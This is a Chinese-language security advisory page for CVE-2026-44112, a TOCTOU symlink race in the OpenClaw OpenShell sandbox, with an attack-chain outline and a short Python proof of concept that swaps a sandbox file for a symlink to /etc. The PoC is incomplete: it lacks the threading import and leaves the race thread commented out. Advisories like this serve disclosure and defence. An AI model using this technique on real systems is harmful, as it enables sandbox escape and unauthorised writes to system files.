CVE-2026-44112 CVSS 9.6 严重

CVE-2026-44112 OpenClaw TOCTOU竞态条件漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44112

漏洞类型

竞态条件

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.4.22之前版本的OpenShell沙箱文件系统中存在严重的检查时与使用时（TOCTOU）竞态条件漏洞。该漏洞允许攻击者在文件系统写入操作期间，利用符号链接交换技术，将原本限制在沙箱内的写入操作重定向到本地挂载根目录之外的任意位置。这可能导致攻击者绕过安全限制，恶意修改系统文件或植入后门，严重威胁系统的完整性和可用性。

技术细节

该漏洞的核心机制在于OpenClaw处理文件写入时的非原子性操作。在OpenShell沙箱环境中，系统通常分为两个步骤处理文件写入：首先是验证目标路径是否合法（即是否位于挂载根目录内），其次是执行实际的写入数据操作。然而，在这两个步骤之间存在一个短暂的时间窗口。攻击者如果拥有低权限账户，可以利用这个时间差发起竞态攻击。具体利用方式是：攻击者预先在沙箱内创建一个合法文件，并在系统进行路径检查后、实际写入发生前的瞬间，利用并发线程将该文件快速替换为指向沙箱外部敏感路径的符号链接。由于系统仅进行了初始检查而未在写入时再次验证，数据最终会被写入到符号链接指向的沙箱外部位置，从而成功实现了沙箱逃逸和越权文件写入。

攻击链分析

STEP 1

1. 获取访问权限

攻击者获取OpenShell沙箱的低权限账户访问权限。

STEP 2

2. 准备攻击环境

在沙箱内部创建一个合法的文件路径，并准备指向沙箱外部的符号链接。

STEP 3

3. 触发竞态条件

在系统检查路径合法性与实际写入数据之间的微小时间窗口内，利用并发操作将合法文件替换为符号链接。

STEP 4

4. 执行越权写入

系统执行写入操作，数据被重定向写入到沙箱外部的敏感位置。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os
import time

# Target file inside sandbox
safe_path = "/sandbox/safe_file.txt"
# Target symlink outside sandbox
malicious_link = "/sandbox/safe_file.txt"
outside_target = "/etc/malicious_config"

# Thread to perform the swap
def race_condition():
    while True:
        try:
            # Remove the safe file and create a symlink to outside
            os.remove(safe_path)
            os.symlink(outside_target, malicious_link)
        except:
            pass

# Start the race thread in a real scenario
# race_thread = threading.Thread(target=race_condition)
# race_thread.start()

# Simulate the vulnerable write operation (Victim)
# Check happens here (safe_path is valid)
# ...
# Write happens here (safe_path might be a symlink now)
with open(safe_path, 'w') as f:
    f.write("MALICIOUS PAYLOAD")

print("Exploit attempt finished")

影响范围

OpenClaw < 2026.4.22

防御指南

临时缓解措施

建议立即限制OpenShell沙箱的写入权限，或暂时禁用受影响的功能，直到完成升级。同时，应监控系统是否存在异常的文件写入行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表